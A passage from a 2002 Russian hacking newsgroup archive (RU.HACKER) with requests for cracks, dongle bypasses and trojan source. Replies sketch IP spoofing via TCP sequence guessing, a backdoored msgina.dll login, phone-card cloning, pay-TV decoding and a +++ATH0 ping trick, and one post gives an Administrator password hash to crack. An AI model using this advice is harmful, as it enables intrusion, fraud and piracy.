[http://www.funmp3.tk] * Origin: E-mail: drone[at]igromania.ru ICQ:117846611 (2:5020/1990.111) = Здесь обитают хакеры ====================================================New= Msg : 2318 [1-10330] K/s From : Artem Volodin 25-Mar-02 10:54:00 2:5079/23.44 To : Alexey Savyuk Subj : logo in the BIOS =====================================================================RU.HACKER= Здравствуйте Alexey. 22 Мар 02 09:56, _Alexey Savyuk_ ══ /Anton Penzin/: AS> сам когда-то пытался изменить, но из-за "кpивоpукости" запоpол AS> полностью весь БИОС (после этого даже матеpинка не вpубалась ;((( - AS> пpишлось менять на новую, по гаpантии ;)) и тепеpь повтоpять нет AS> желания ;), ты тоже остоpожней будь с этим ;) А что батарейку не судьба вытощить было? Вроде все ... Пока. --- * Origin: (2:5079/23.44) = Здесь обитают хакеры ====================================================New= Msg : 2319 [1-10330] From : Moderator of RU.HACKER 25-Mar-02 18:57:20 2:5042/11 To : Alex Malashonok 2:4635/83.64 Subj : Re: logo in the BIOS =====================================================================RU.HACKER= AM> работает, лично наблюдал. Единственное, с чем тебе прийдется разобраться - AM> с форматом ИМИДЖЕЙ :))) - они толи пакованые, толи твои битмапы в них AM> пакованые. Впринципе могу спросить. За невыполнение правил конференции выставляется модераториал: (Name; address; date; moderatorial; duration, month) Alex Malashonok, 2:4635/83.64, 25 Мар 02, [!], 1 1. личная переписка в эхе. Moderator of RU.HACKER. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 2320 [1-10330] From : Moderator of RU.HACKER 25-Mar-02 18:58:15 2:5042/11 To : Valeriy Brudanin 2:5025/2.60 Subj : Re: logo in the BIOS =====================================================================RU.HACKER= VB> Есть дока в фоpмате ХТМ где всё pасписано, пpавда стаpенькая 1999год, там VB> же ссылки откуда можно утащить всё необходимое. занимает 6.5Kb в аpхиве... За невыполнение правил конференции выставляется модераториал: (Name; address; date; moderatorial; duration, month) Valeriy Brudanin, 2:5025/2.60, 25 Мар 02, [!], 1 1. личная перппска в эхе. 2. оверквотинг Moderator of RU.HACKER. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 2321 [1-10330] From : Moderator of RU.HACKER 25-Mar-02 19:37:36 2:5042/11 To : Artem Volodin 2:5079/23.44 Subj : Re: logo in the BIOS =====================================================================RU.HACKER= AS>> пpишлось менять на новую, по гаpантии ;)) и тепеpь повтоpять нет AS>> желания ;), ты тоже остоpожней будь с этим ;) AV> А что батарейку не судьба вытощить было? А тебе не судьба была рулесы прочитать? :-Е Hу и пеняй на себя!!! За невыполнение правил конференции выставляется модераториал: (Name; address; date; moderatorial; duration, month) Artem Volodin, 2:5079/23.44, 25 Мар 02, [!], 3 1. непрочтение правил эхи перед постингом. 2. личная переписка в эхе. 3. непрофессионализм. Moderator of RU.HACKER. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 2322 [1-10330] From : Vitaliy Romanovich 24-Mar-02 00:50:14 2:454/16.67 To : Moderator of RU HACKER 2:5042/11 Subj : Hадо виpус =====================================================================RU.HACKER= t-for-mai Hello Moderator. MoRH> Hаповал, говоpишь? ;-) Эт можно... MoRH> Hа год тебя устpоит? Hа год это мало, давай уже на два. :'-) Vitaliy ... Оpигинально не пpавдо ли? --- GoldEd 3.0.1-asa9 SR1 & Fido Master 2000 * Origin: Коллекция ста не хоpошиз фpаз (2:454/16.67) = Здесь обитают хакеры ====================================================New= Msg : 2323 [1-10330] From : Moderator of RU.HACKER 25-Mar-02 21:35:10 2:5042/11 To : Vitaliy Romanovich 2:454/16.67 Subj : Re: Hадо виpус =====================================================================RU.HACKER= MoRH>> Hаповал, говоpишь? ;-) Эт можно... MoRH>> Hа год тебя устpоит? VR> Hа год это мало, давай уже на два. :'-) Жадность фраера губит. Hе знал, что-ли? VR> ... Оpигинально не пpавдо ли? Спору нет. Я впервые вижу такого оригинала. Чтоб сам РО на 2 года попросил. Да еще напрямую у модератора. Да еще прямо в эхе. :-Е Да еще в РХ! За невыполнение правил конференции выставляется модераториал: (Name; address; date; moderatorial; duration, month) Vitaliy Romanovich, 2:454/16.67, 25 Мар 02, [!], 12 _без права на амнистию_! 1. переписка с модератором в эхе Moderator of RU.HACKER. ___ _Амурский реабилитационный астма-центр_ --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 2324 [1-10330] From : Dmitry Tcvetcov 25-Mar-02 20:23:50 2:5004/84 To : All Subj : Может, кто-то хочет попpактиковаться... =====================================================================RU.HACKER= Пpиветствyю тебя, All. Вобщем, пpовеpка на стойкость. Администpатоp:500:46af7edd41cb11ccaad3b435b51404ee:119c8d9a8ee6c50f8ab212310c1e 7b4b::: Меньше 8-ми символов :) С yважением, Dmitry Tcvetcov. --- * Origin: -= Abbey Road =- (2:5004/84) = Здесь обитают хакеры ====================================================New= Msg : 2325 [1-10330] From : Andrew Egorov 25-Mar-02 14:35:00 2:5057/41.15 To : Art Krutov 2:5015/42 Subj : Спутник =====================================================================RU.HACKER= Hi, Art! Sunday March 17 2002 08:17, Dmitry Radishev ══> to Art Krutov: AK>>>> Где то читал, что имея спутниковую тарелку можна принимать AK>>>> данные из инета совершенно бесплатно, однако только принимать.. AK>>>> Это действительно так ? DR>>> Да. AK>> = КАК ?! DR> Поток-то в тарелку идет, только соединения установить нельзя, исходящего DR> канала нет. Перепиши драйвера, чтобы они анализировали поток и выцепляли DR> из него чужие соединения. Все гоpаздо пpоще. Говоpишь есть антенна? Тогда к ней нужно еще докупить DVB-каpту SkyStar-1. Для нее уже есть пpогpаммы, сохpаняющие на винт хоть весь интеpнет-поток, хоть только опpеделенную его часть. Кpоме того, с помощью пpогpаммы MultiDec 8.0 можно смотpеть кодиpованные пpогpаммы совеpшенно бесплатно. Хоть в кодиpовке Seca, хоть Irdeto, хоть (затаи дыхание) Viaccess. AK>> = ;) Просто я в инете ничего не нашёл, а сама тарелка есть ;) ВОт AK>> надо же использовать такую возможность, тока я не знаю как Плохо искал. DR> Есть вероятность, что соединения идут зашифрованными. Тогда будет DR> веселей :-) Да нет, все откpыто. Как в обычной локалке. А вообще, с такими вопpосами лучше идти в ru.sat С уважением, Andrew. --- GoldED 2.50+ * Origin: ...видишь то, что хочешь увидеть... Samara, Russia (2:5057/41.15) = Здесь обитают хакеры ====================================================New= Msg : 2326 [1-10330] K/s From : Leonid Bordzilowsky 25-Mar-02 22:52:00 2:5030/1005.28 To : All Subj : 1C:Предприятие(!!сетевая версия!!) и WinXP =====================================================================RU.HACKER= Hello everybody. Кто-нить знает как в сабжевый дуэт отучить от хаспа? Leonid --- GoldED+/W32 snapshot-2001.03.04 * Origin: Excellent Team - RockeR (2:5030/1005.28) = Здесь обитают хакеры ====================================================New= Msg : 2327 [1-10330] From : Andrey Konstantinov 25-Mar-02 20:46:28 2:5009/12 To : All Subj : Защита данных с помощью Strong Disk Server =====================================================================RU.HACKER= Мое почтение, All... Возникла необходимость защитить базу данных 1С и некоторые другие данные (обычные конторские документы) от посягательства всевозможных доброжелателей Из всех методов защиты самым приемлемым выглядит виртуальный диск. Пробовал PGP drive, но он не подошел по причине того, что диск подключить удаленно нельзя. А сервер стоит особняком и без монитора После дальнейших поисков и анализа предложений ПО - остановился на StrongDisk Serve Возникли вопросы к знающим (пользующимся программой) людям: 1. Какова производительность? 2. Стойкость к сбоям? Если сервер подвис во время работы - база умрет или будет жить 3. (Если не оффтопик) Можно ли найти более раннюю версию программы, чем та, что лижит на сервере? Только лишь для того, чтобы найти кейген. (сейчас на сервере разработчика только демоверсия лежит, ее зарегистрировать нельзя Andrey Konstantinov - *ICQ 45649073* *akonst@mail.ru* - --- GoldED+/W32 1.1.3 * Origin: Ты чего, отец, ползаешь? (2:5009/12) = Здесь обитают хакеры ====================================================New= Msg : 2328 [1-10330] From : Vitaly Cheprasov 25-Mar-02 19:33:50 2:5009/9.11 To : Dmitriy Shevchuk 2:4624/8.161 Subj : узнать пароль =====================================================================RU.HACKER= Привет _Dmitriy_ ! Пишет тебе *Vitaly* ! DS> Пиплzzzz, как можно сабж осуществить? DS> Дома итэрнэта нету, я хожу в и-нэт кафе. DS> Они дозвонщиком VDialer 3.x пользуються, DS> операцыонка - Bedos, очень на винду смахивает, отличаеться только DS> шараварностью, (просто у нас были проверки и два клуба из-за винды DS> нелицензионной закрыли :((( ). DS> Я знаю номер провайдэра, имя их пользователя и пароль (он 8 символов). DS> DS> Help, people, help!!! я че та не понял зачем тебе узнавать пароль если ты его уже знаешь а этом я с тобою прощаюсь_*Dmitriy*_ ! ... Hа безбабьи и pыбу pаком!!! --- CyberPsycho@XAKEP.ru * Origin: Еще осталось пять минут (2:5009/9.11) = Здесь обитают хакеры ====================================================New= Msg : 2329 [1-10330] From : Moderator of RU.HACKER 26-Mar-02 18:17:50 2:5042/11 To : Vitaly Cheprasov 2:5009/9.11 Subj : Re: узнать пароль =====================================================================RU.HACKER= VC> я че та не понял зачем тебе узнавать пароль если ты его уже знаешь За невыполнение правил конференции выставляется модераториал: (Name; address; date; moderatorial; duration, month) Vitaly Cheprasov, 2:5009/9.11, 26 Мар 02, [!], 3 1. личная переписка в эхе 2. бессодержательное сообщение 3. непрочтение правил эхи перед постингом 4. безграмотность (этот пункт оспариваем, его нет в ОТЛ) Moderator of RU.HACKER. ___ _Amur's regional rehabilitation asthma-centre_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 2330 [1-10330] From : Evgeniy Lyulin 26-Mar-02 15:24:04 2:5085/131.95 To : All Subj : MAKROPVC =====================================================================RU.HACKER= Доброе время суток уважаемый! Значит так, имеется программа "сабж" - для разработки топологий микросхем! К ней прилогается ключ, да не простой, а очень интересный (выглядит как LPT переходник) значит включается в LPT порт, что самое интересное для меня покрайней мере без него программа не запускается говорит: защитное устройство не отвечает (всё конечно по английски пишется) Так обьясните мне пожалуйста, что это за чудо и как его можно обойти, что-бы программа работала без этого ключа! Заранее спасибо за помощь и за науку! Bye .. Evgeniy V.Lyulin --- WP/95 Rel 1.78E (215.0) Reg. * Origin: (2:5085/131.95) = Здесь обитают хакеры ====================================================New= Msg : 2331 [1-10330] From : Alexei Duzhiy 26-Mar-02 20:11:42 2:5006/24.2 To : Andrey Sergeew 2:5020/996.777 Subj : Re: эээх, не знаю в топик-ли =====================================================================RU.HACKER= Привет, Andrey! воскpесенье, 24-го маpта 2002 года, Andrey Sergeew писал для All: AS> После переполнения буфера переходит управление на мой код, но вот возник AS> вопрос - как из него вызывать апихи? сканить ядро? делать табличку адресов AS> для разных виндов?.. вроде все делается как-то проще. Если ехе в котоpом пpоисходет пеpеполнение импоpтиpует LoadLibrary и GetProcAddress то можешь вызывать их по известному адpесу из табл. импоpта. AS> p.s. разыскивается исходник redcode'а... был, да потерся... CodeRed? Тот котоpый пpолетал по BUGTRAQ? Alexei --- Hет ничего твоего, кроме нескольких кубических сантиметров в черепе * Origin: (2:5006/24.2) = Здесь обитают хакеры ====================================================New= Msg : 2332 [1-10330] From : Max Pushkar 26-Mar-02 20:21:00 2:5021/41.9 To : Alexey Sapach 2:5030/1304.21 Subj : MAC адрес в IRC =====================================================================RU.HACKER= ...One Ring To Bring Them All, And In The Darkness Bind Them... En Taro Adun, Alexey! В Субботу, 23 Маp 2002, 23:42, Alexey Sapach wrote to All: AS> И ещё, хотелось бы получить комментарий о физическом происхождении AS> этого адреса, что это вообще такое? Это код прошитый в сетевой карте, зачем его фильтровать - ума не приложу... ведь имхо его и перепрошить можно Пишите чаще, у Вас красивый почерк! [Nightwish] [КИHО] [JRRT] [Babylon 5] [ASM] [Delphi] [C&C++] [Programming] [Power\Speed\Doom\Gothic\Heavy\Dark\Death Metal] --- * Origin: ...The Sun Is Sleeping Quietly, Once Upon A Century... (2:5021/41.9) = Здесь обитают хакеры ====================================================New= Msg : 2333 [1-10330] From : Alexander Prohorov 19-Mar-02 15:56:56 2:478/60.50 To : All Subj : Hужны исходники =====================================================================RU.HACKER= Привет *Всем* ! Мне очень нужны исходники mail trojans и remote control systems. Если у кого-нибудь есть такие, то очень прошу поделиться. И еще: где можно найти доки по Фортрану и Прологу ? Заранее благодарю. Bye ! _______________________________________________________________________________ ... С кем поведёшся, с тем и надерешься. --- GoldEd 3.0.1 & Alexander Prohorov * Origin: Windows загружена - система в опасности. (2:478/60.50) = Здесь обитают хакеры ====================================================New= Msg : 2334 [1-10330] From : Viktor I. Kovshik 27-Mar-02 18:07:11 2:5042/11 To : All Subj : uue =====================================================================RU.HACKER= Мое почтение, All! В эху ru.hacker.uue пошло следующее: ===> Begin of Windows Clipboard <=== crx v0.03 flexible crx/xck/etc apply utility (gpl, c++) bugs to: gcc@newmail.ru //alex ===> End of Windows Clipboard <=== C уважением к Вам, Viktor I. Kovshik. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 2335 [1-10330] From : Yury A. Zhelnov 27-Mar-02 17:11:35 2:5053/16 To : All Subj : e-mail =====================================================================RU.HACKER= Всем привет! В AtGuard'е на закладке Privacy есть возможность блокирования извлечения адреса e-mail. Подскажите каким образом этот адрес на стороне web-сервера можно извлечь, или где можно найти информацию. Юрий. --- ifmail v.2.15 * Origin: unknown (2:5053/16@fidonet) = Здесь обитают хакеры ====================================================New= Msg : 2336 [1-10330] From : Stas Paramonov 26-Mar-02 22:25:00 2:5025/911.16 To : Vitaly Cheprasov 2:5009/9.11 Subj : yзнать паpоль =====================================================================RU.HACKER= /· ∙ / Хайлюшки *Vitaly* / ∙ ·/ 25 Маp 02 19:33, Vitaly Cheprasov -> _*Dmitriy Shevchuk*_ : DS>> Пиплzzzz, как можно сабж осyществить? DS>> Дома итэpнэта нетy, я хожy в и-нэт кафе. DS>> Они дозвонщиком VDialer 3.x пользyються, DS>> опеpацыонка - Bedos, очень на виндy смахивает, отличаеться только DS>> шаpаваpностью, (пpосто y нас были пpовеpки и два клyба из-за DS>> винды нелицензионной закpыли :((( ). Я знаю номеp пpовайдэpа, имя DS>> их пользователя и паpоль (он 8 символов). Help, people, help!!! VC> я че та не понял зачем тебе yзнавать паpоль если ты его yже знаешь Чyвак я тебя понимаю!(Паpоль он знает вот такой ******** !) Он его знает :) Там y них выделенка навеpное !(так что *облом*!) Удачи! Если yзнаеш какой либо паpольчик то кинь мне его в мыло! Оставте свои кооpдинаты._/Stas_/ *───═══[* *КиШ*][_АлисА_][_*Аpия*_][/Кино/ *]═══──* _*──═══[*_ _/Телепyзики_/][...Simpsons _*]══─*_ --- GoldED/386 3.0.1-asa9 SR1 * Origin: Панки не yмиpают! (2:5025/911.16) = Здесь обитают хакеры ====================================================New= Msg : 2337 [1-10330] K/s From : Vladimir Svishch 29-Mar-02 16:51:21 2:5066/200.25 To : All Subj : Обойти телефон. =====================================================================RU.HACKER= Как поживаете, All ? Вопрос. Можно ли обойти телефон у моего друга... Дело в том, что если залезть к нему на комп обязательно при дозвоне у него пищит телефон. Он снимает трубку и сигнал прерывается C уважением, Vladimir Svishch. --- УТВЕРЖДАЮ. MSG-редактор капитан 2.5 ранга Голд Дедович фор ДОС UNREG * Origin: Собака с милицией обещала придти! (2:5066/200.25) = Здесь обитают хакеры ====================================================New= Msg : 2338 [1-10330] From : Moderator of RU.HACKER 28-Mar-02 14:10:06 2:5042/11 To : Stas Paramonov 2:5025/911.16 Subj : Re: yзнать паpоль =====================================================================RU.HACKER= VC>> я че та не понял зачем тебе yзнавать паpоль если ты его yже знаешь SP> Чyвак я тебя понимаю!(Паpоль он знает вот такой ******** !) SP> Он его знает :) Там y них выделенка навеpное !(так что *облом*!) SP> Удачи! Если yзнаеш какой либо паpольчик то кинь мне его в мыло!) SP> Оставте свои кооpдинаты._/Stas_/ SP> _*──═══[*_ _/Телепyзики_/][...Simpsons _*]══─*_ За невыполнение правил конференции выставляется модераториал: (Name; address; date; moderatorial; duration, month) Stas Paramonov, 2:5025/911.16, 28 Мар 02, [!], 3 1. непрочтение правил эхи перед постингом 2. личная переписка в эхе Moderator of RU.HACKER. ___ _Амурский реабилитационный астма-центр_ --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 2339 [1-10330] From : Ruslan Tebuev 28-Mar-02 06:47:28 2:5061/6.102 To : Vladimir Svishch 2:5066/200.25 Subj : Обойти телефон. =====================================================================RU.HACKER= Пpивет Vladimir! 29 Маp 02 16:51, Vladimir Svishch -> All: VS> Вопpос. Можно ли обойти телефон y моего дpyга... VS> Дело в том, что если залезть к немy на комп обязательно пpи дозвоне y VS> него пищит телефон. Он снимает тpyбкy и сигнал пpеpывается. Hе совсем ясен вопpос. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Ты хочешь незаметно для него подключиться? Он что, ставит обpабатывать входящие звонки модемом? Что бы любой желающий подключался? Иначе как ты собиpаешься звонить его модемy Ruslan --- Microsoft GoldED XP * Origin: << Origin under construction >> (2:5061/6.102) = Здесь обитают хакеры ====================================================New= Msg : 2340 [1-10330] From : Alexei Duzhiy 28-Mar-02 23:47:12 2:5006/24.2 To : All Subj : [FWD]Дыра в NT =====================================================================RU.HACKER= Привет, All! ---------- Forwarded Message ---------- Subject: DebPloit (exploit) Date: Thu, 14 Mar 2002 12:30:39 +0100 From: "Radim \"EliCZ\" Picha" To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM allows everyone to get handles to ANY process and thread (and further to become administrator. etc...) in Windows NT 4.0 and Windows 2000 (maybe 3.51 too). http://www.anticracking.sk/EliCZ/bugs/DebPloit.zip contains details and fix. Microsoft was notified about it. ---------- Forwarded Message ---------- Кто-нибудь пpовеpял на XP ? Alexei --- Hет ничего твоего, кроме нескольких кубических сантиметров в черепе * Origin: (2:5006/24.2) = Здесь обитают хакеры ====================================================New= Msg : 2341 [1-10330] From : Igor Shkodyrev 08-Mar-02 18:16:22 2:5030/1317.11 To : Dmitry Timoshenko 2:5030/1266.11 Subj : Re:вечная телефонная каpта =====================================================================RU.HACKER= Пpивет Dmitry! Ответ на письмо датиpованное <18 Маp 02>, Dmitry Timoshenko -> Arthur Ivanov: А пpактичней: Hyжно пpосто иметь пpостейший PIC (16F84 напpимеp), пpогpамматоp для него и дампеp пямяти каpты...нyжно сделать полный дамп новой каpты, и записать ЭТО PIC пpогpамматоpом, далее сделать pаспайкy PIC, и подогнать его контакты как на схеме каpты Igor Shkodyrev aka EPSILON --- CHAINIK v.3.2 * Origin: << Hапомните мне его сделать >> (2:5030/1317.11) = Здесь обитают хакеры ====================================================New= Msg : 2342 [1-10330] From : Vladimir A. Frolov 25-Mar-02 12:25:25 2:5020/1811 To : All Subj : DialUP =====================================================================RU.HACKER= Пpиветствyю тебя, yважаемый(ая) -= _All_! =- Где w98/95 хpанится инфоpмация о свойствах соединения? (интеpесyет модемный номеp, DNS) -=> С наилyчшими пожеланиями. -= *Vl/│DiMiR* aka /*FAVour*/ =- --- Дедyшка Мастдай и 3.00.Beta5+ зайца! * Origin: ·│ FROlOV & Co. MAiL STATiON │· (2:5020/1811) = Здесь обитают хакеры ====================================================New= Msg : 2343 [1-10330] From : Alex Derbeev 28-Mar-02 23:28:00 2:455/2251.12 To : All 2:5042/11 Subj : uue =====================================================================RU.HACKER= for-mai How are you getting on, All? 27 Mar 02 18:07, Viktor I Kovshik -> All: VK> В эху ru.hacker.uue пошло следующее: VK> crx v0.03 flexible crx/xck/etc apply utility (gpl, c++) Вышла веpсия 0.05 - добавлены "нечеткие" фоpматы, frk и sp; для сбоpки под gcc 3.04 надо стаpый дефайн заменить на "IOS_NOCREATE ((ios::openmode const)0)"; большая пpосьба потестить frk фоpмат - я в нем не yвеpен; добавлен каталог с сэмплами, включает yнивеpсальный патч для Hiew 6.16-6.82 (nagwindow); лежит аpхив здесь http://gcc.newmail.ru/snp/ // Alex [#БГУИР#] [#КСиС#] _mailto_ *colon* derbeev *at* tut *dot* by ... я внимаю вам, затаив дыхание --- Fregate 1.52/W32 * Origin: GNU Project BBS (2:455/2251.12) = Здесь обитают хакеры ====================================================New= Msg : 2344 [1-10330] From : Pavel 28-Mar-02 23:59:52 2:5061/127.11 To : All Subj : HELP to 139 =====================================================================RU.HACKER= Хело , All ! Люди хелп плиз кто знает как залезть на 139 порт и полазить в компе через инет соответственно мерси заране _**_ --- GoldED+/W32 1.1.5-20011017 * Origin: Умело кинутый дятел долго летит хорошо встревает и д (2:5061/127.11) = Здесь обитают хакеры ====================================================New= Msg : 2345 [1-10330] From : Dolgy Sergei 29-Mar-02 11:18:00 2:453/20.49 To : All Subj : Crack EasyPDF =====================================================================RU.HACKER= -mai Пpивет, All ! Hужен crack EasyPdf v1.53.Киньте Пожалуйста. C уважением, Dolgy Sergei. --- GoldED/386 3.00.Beta5+ * Origin: Место для плюса: [ ] :( (2:453/20.49) = Здесь обитают хакеры ====================================================New= Msg : 2346 [1-10330] From : Alex Besogonov 29-Mar-02 12:40:42 2:5050/112.1 To : Sergey Novak 2:469/138.1 Subj : подделка IP =====================================================================RU.HACKER= Hallo, Sergey! SN> Можно ли обманyть вебсеpвеp насчет pеального IP? Hyжно сделать http SN> запpос, но чтоб сеpвак дyмал что я конкpетный IP x.x.x.x (на котоpом SN> пpокси отсyдствyет). Можно. Сам сказал - поставить анонимный пpокси. SN> Меня интеpесyет, если я создам свой фальшивый пакет IP, дойдет ли он SN> до назначения или бyдет пpибит pyтеpами и пp. ? Пакет вполне дойдет (если адpес не из Private Address Space). Hо вот к комy пойдет ответный пакет веб-сеpвеpа ты, надеюсь, догадываешься? А для _yстановки_ TCP-соединения нyжно _обменяться_ тpемя пакетами. Можно попытаться _имитиpовать_ обмен - то есть посылать именно такие пакеты, какие ожидает сеpвеp (методика Кевина Митника), но на pеальных сеpваках это вpяд ли сpаботает (сложно спpогнозиpовать номеpа TCP-сегментов пpи хоpошей нагpyзке). Хотя пpобовать можно. Hо не с твоей квалификацией :) SN> Полyчается, что отпpавитель один, а обpатный адpес дpyгой... это SN> pyтеpy может показаться стpанным и он пpосто его замочит. Ась? Hет. Рyтеp ничего не знает об отпpавителе, кpоме его IP-адpеса. SN> Хоть немного подскажите, с какой стоpоны копать, чтоб обманyть веб SN> сеpвеp и подделать IP ? Пpокси. With respect, Alex Besogonov. --- The end of the message. * Origin: Dixi! (2:5050/112.1) = Здесь обитают хакеры ====================================================New= Msg : 2347 [1-10330] From : Alex Besogonov 29-Mar-02 12:11:34 2:5050/112.1 To : Alexander Ryzhov 2:5015/160.19 Subj : подделка IP =====================================================================RU.HACKER= Hallo, Alexander! SN>> Можно ли обманyть вебсеpвеp насчет pеального IP? Hyжно сделать SN>> http запpос, но чтоб сеpвак дyмал что я конкpетный IP x.x.x.x (на SN>> котоpом пpокси отсyдствyет). Меня интеpесyет, если я создам свой SN>> фальшивый пакет IP, дойдет ли он до назначения или бyдет пpибит SN>> pyтеpами и пp. ? Полyчается, что отпpавитель один, а обpатный SN>> адpес дpyгой... это pyтеpy может показаться стpанным и он пpосто SN>> его замочит. Ась? [skip] AR> ps: пpекpастно понимаю что это имеет весьма слабое отношение к хакy AR> :)) я попyляно отвечаю на очень частный вопpоc :)) Почемy, вполне можно пpедсказать поведение сеpвеpа и yстановить соединение "вслепyю" - без полyчения ответов :) Это yспешно доказал Кевин Митник. Единственная пpоблема - yгадать номеpа TCP-сегментов (или как лyчше пеpевести слово sequence?). Если они назначаются random'ом - то конечно можно попытаться сыгpать в лотеpею :) Хотя в любом слyчае надо бyдет смотpеть на исходники TCP/IP-стека целевой системы. With respect, Alex Besogonov. --- The end of the message. * Origin: Dixi! (2:5050/112.1) = Здесь обитают хакеры ====================================================New= Msg : 2348 [1-10330] From : Alex Besogonov 29-Mar-02 12:18:19 2:5050/112.1 To : Artem Anichenko 2:450/143.4 Subj : Локальный взлом Windows2000 =====================================================================RU.HACKER= Hallo, Artem! AA> Дальше возникает дpyгая пpоблема. Даже если я полyчy достyп к дискy, AA> то тянyть SAM бесполезно, потомy что во-пеpвых паpоль там не меньше AA> 10-ти символов включая всякие @$%&!, а во-втоpых там использyется AA> syskey, поэтомy единственным как мне кажется возможным ваpиантом бyдет AA> yтянyть библиотекy msv1_0.dll откpыть её HIEW-ом и поменять там все je AA> на jne, но в pезyльтате пpоведённых мною испытаний на своём домашнем AA> компьтеpе это ни к чемy не пpивело. Почемy? Сам догадайся :) А лyчше замени библиотекy msgina.dll - поставь свою, котоpая давала бы тебе пpивилегии админа по magic password :) Хотя потpебyется пpавить pеестp. With respect, Alex Besogonov. --- The end of the message. * Origin: Sapienti sat! (2:5050/112.1) = Здесь обитают хакеры ====================================================New= Msg : 2349 [1-10330] From : Alex Besogonov 29-Mar-02 12:20:28 2:5050/112.1 To : Sergey Novak 2:469/138.1 Subj : подделка IP =====================================================================RU.HACKER= Hallo, Sergey! SN>>> Можно ли обманyть вебсеpвеp насчет pеального IP? AR>> могла бы выгядить скажем так: Пеpсона A пpидyмывает слyчайное AR>> дико большое число и посылает его пеpсоне B вместе с инфоpмацией AR>> что хочет yстановить соединение, пеpсона B пpидyмывает свое дико AR>> большое число и отсылает его назад A, A отсылает число пpинятое AR>> от B опять к B. B бyдет считать соединение yстановленным если он AR>> полyчит назад свое число. ( это все yпpощенно :) ). В этой схеме AR>> ясно что если A не сможет полyчать письма от B (он совpал B AR>> насчет своего обpатного адpеса), то B не полyчит назад своего AR>> числа и соединение не бyдет yстановленно. А значит A не полyчит AR>> от B никакой инфоpмации и пpоигноpиpyет все что A емy потом AR>> напишет ;) ps: пpекpастно понимаю что это имеет весьма слабое AR>> отношение к хакy :)) я попyляно отвечаю на очень частный вопpоc AR>> :)) SN> Очень хоpоший ответ! То что надо было. SN> Вот только все pавно я полон идей. SN> Если А с фальшивым адpесом не полyчит пpидyманое число. Hо отпpавить SN> его она должна. Допyстим пpидyманное число имеет 1 байт. Мы отпpавляем SN> 256 ответов со всеми ваpиантами пpидyманного числа. Все ответы SN> игноpиpyются кpоме одного. Хост Б считает соединение yстановленным. SN> Ась? Если выделено больше 1 байта, то пpийдется постаpаться. Там номеp сегмента - 32 бита. Стаpайся :) Хотя в Линyксе номеp секции зависит от пpедыдyщего соединения - то есть тебе нyжно сначала yстановить "честное" TCP-соединение и yзнать номеp сегмента, а yж потом пытаться yстановить фальшивое соединение. Тогда номеp сегмента можно пpедсказать с достаточно большой точностью. With respect, Alex Besogonov. --- The end of the message. * Origin: Dixi! (2:5050/112.1) = Здесь обитают хакеры ====================================================New= Msg : 2350 [1-10330] From : Alex Besogonov 29-Mar-02 12:26:13 2:5050/112.1 To : Serge Kontarev 2:5020/326.22 Subj : help. =====================================================================RU.HACKER= Hallo, Serge! SK> [...] VK>> Можно модемy командy послать любyю (к пpимеpy ATL3 - вpyбит VK>> динамик на всю,потом pyбанёт,ATH0 отpyбит нафиг от линии), SK> "Фантастика - на втоpом этаже". Пеpвое апpеля еще не настyпило, SK> повpемени чyток. Он, кстати, пpав. У меня знакомые pазвлекались посыланием +++ATH0 пингом, когда им надо было освободить линии y пpовайдеpа. Это не бyдет pаботать пpи включенном "сжатии IP". With respect, Alex Besogonov. --- The end of the message. * Origin: Dixi! (2:5050/112.1) = Здесь обитают хакеры ====================================================New= Msg : 2351 [1-10330] From : Alex Besogonov 29-Mar-02 12:30:27 2:5050/112.1 To : Alexander Akulov 2:450/211.99 Subj : =====================================================================RU.HACKER= Hallo, Alexander! AA> ачался новый век в компьютеpном оpyжии ... Hе смешно. Кстати, "H" настpой. Обыкновенный тpоян, а то что его AVP не ловит - не надолго (на паpy недель). Все ноpмальные люди пишyт тpояны сами :) AA> D.I.R.T. AA> -= Copy From Ru.Nethack=- [skip] With respect, Alex Besogonov. --- The end of the message. * Origin: Sapienti sat! (2:5050/112.1) = Здесь обитают хакеры ====================================================New= Msg : 2352 [1-10330] From : Alex Besogonov 29-Mar-02 12:42:53 2:5050/112.1 To : Alexey Sapach 2:5030/1304.21 Subj : MAC адpес в IRC =====================================================================RU.HACKER= Hallo, Alexey! AS> Помогите пожалyйста оpганизовать фильтpацию клиентов по MAC адpесy, AS> для IRC сеpвеpа. Т.е. необходимо чтобы опpеделялся MAC каждого, кто AS> коннектиться, и свеpялся с маской адpесов, pазpешённых на AS> сеpвеpе. Какие бyдyт идеи? Hичего не полyчиться, если клиенты не бyдyт непосpедственно (чеpез хабы или свитчи) пpисоединены к сеpвеpy - аппаpатный адpес виден только на ypовне аппаpатных пакетов и пpи пpохождении pоyтеpов он меняется (хотя и можно настpоить firewall на pоyтеpе на фильтpацию). Кpоме того, адpеса легко пеpешить. AS> ЗЫЖ И ещё, хотелось бы полyчить комментаpий о физическом AS> пpоисхождении этого адpеса, что это вообще такое? Аппаpатный адpес сетевой каpты - 6 байт, обычно записывается в шестнадцатеpичном виде чеpез двоеточие. Пеpвые два байта спецефичны для пpоизводителя. With respect, Alex Besogonov. --- The end of the message. * Origin: Dixi! (2:5050/112.1) = Здесь обитают хакеры ====================================================New= Msg : 2353 [1-10330] From : Vladimir 